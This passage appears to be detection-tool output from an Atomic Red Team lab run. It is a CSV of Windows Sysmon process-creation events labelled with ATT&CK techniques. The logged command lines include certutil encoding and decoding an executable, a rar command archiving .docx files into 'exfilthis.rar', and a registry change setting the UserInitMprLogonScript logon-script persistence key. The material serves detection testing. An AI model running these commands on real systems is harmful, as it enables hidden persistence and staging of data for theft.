<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
</TimeCreated>
<EventRecordID>4064</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -decode file.txt c:\file.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ParentProcessId"">4020</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.961276Z"">
</TimeCreated>
<EventRecordID>4063</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.786</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
<Data Name=""ProcessId"">4020</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
</TimeCreated>
<EventRecordID>4062</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -encode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ParentProcessId"">4832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
</TimeCreated>
<EventRecordID>4062</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
<Data Name=""ProcessId"">1260</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -encode c:\file.exe file.txt</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ParentProcessId"">4832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:03.235828Z"">
</TimeCreated>
<EventRecordID>4061</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:03.223</Data>
<Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
<Data Name=""ProcessId"">4832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:16.830063Z"">
</TimeCreated>
<EventRecordID>4054</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:16.818</Data>
<Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-00101BB73900</Data>
<Data Name=""ProcessId"">2424</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:16.782667Z"">
</TimeCreated>
<EventRecordID>4053</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:16.766</Data>
<Data Name=""ProcessGuid"">747F3D96-D998-5D31-0000-001008B43900</Data>
<Data Name=""ProcessId"">2000</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;rar a -r exfilthis.rar *.docx&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:54:01.955256Z"">
</TimeCreated>
<EventRecordID>4052</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:54:01.940</Data>
<Data Name=""ProcessGuid"">747F3D96-D989-5D31-0000-0010FC7B3900</Data>
<Data Name=""ProcessId"">4944</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:54.976854Z"">
</TimeCreated>
<EventRecordID>4049</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:54.968</Data>
<Data Name=""ProcessGuid"">747F3D96-D982-5D31-0000-0010DC633900</Data>
<Data Name=""ProcessId"">4240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d &quot; cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
